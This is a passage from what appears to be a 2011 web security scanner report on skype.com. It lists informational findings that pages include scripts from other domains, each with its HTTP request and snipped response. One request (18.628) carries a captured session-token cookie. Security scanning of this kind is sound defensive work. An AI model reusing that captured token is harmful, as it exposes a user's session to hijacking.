<script charset="utf-8" src="http://www.skypeassets.com/i/js/skypecheck.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.619. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/skype-mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/skype-mobile/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script charset="utf-8" src="http://www.skypeassets.com/i/js/animation.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/mobile_v2.js" type="text/javascript" xml:space="preserve">
</script>
<script charset="utf-8" src="http://www.skypeassets.com/i/js/skypecheck.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.620. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-on-3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-mobile/skype-on-3/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-mobile/skype-on-3/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:56 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>

   

...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.621. http://www.skype.com/intl/en-us/get-skype/on-your-tv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-tv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-tv HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:58 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52568


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>On your TV</title>
   <meta name="description" content="" />
   <meta name="keywords" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.622. http://www.skype.com/intl/en-us/get-skype/on-your-tv/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-tv/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-tv/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 52568


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>On your TV</title>
   <meta name="description" content="" />
   <meta name="keywords" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.623. http://www.skype.com/intl/en-us/get-skype/other-downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/other-downloads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/other-downloads/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 42500


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Other Downloads - Skype</title>
   <meta name="description" content="" />
   <meta name="ke
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.624. http://www.skype.com/intl/en-us/legal/terms/fair_usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/legal/terms/fair_usage

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/legal/terms/fair_usage HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<hea
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.625. http://www.skype.com/intl/en-us/legal/terms/fair_usage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/legal/terms/fair_usage/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/legal/terms/fair_usage/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:09 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<hea
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.626. http://www.skype.com/intl/en-us/legal/terms/gvc-fair-usage/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/legal/terms/gvc-fair-usage/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/legal/terms/gvc-fair-usage/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:08 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 37568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<hea
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>

   
           <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   
<script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" xml:space="preserve">
</script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.627. http://www.skype.com/intl/en-us/prices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43655


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Cheap Calls and Group Video Calls with Skype - Skype</title>
   <meta name="description" c
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.628. http://www.skype.com/intl/en-us/prices/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:14:13 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 43655
Content-Type: text/html; charset=utf-8
Content-Language: en


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Cheap Calls and Group Video Calls with Skype - Skype</title>
   <meta name="description" c
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.629. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-afghanistan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-afghanistan

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-afghanistan HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.630. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-albania  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-albania

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-albania HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:29 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.631. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-algeria  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-algeria

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-algeria HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:30 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.632. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-american-samoa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-american-samoa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-american-samoa HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:30 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.633. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-andorra  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-andorra

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-andorra HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:31 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.634. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-angola  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-angola

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-angola HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:33 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.635. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-anguilla  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-anguilla

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-anguilla HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
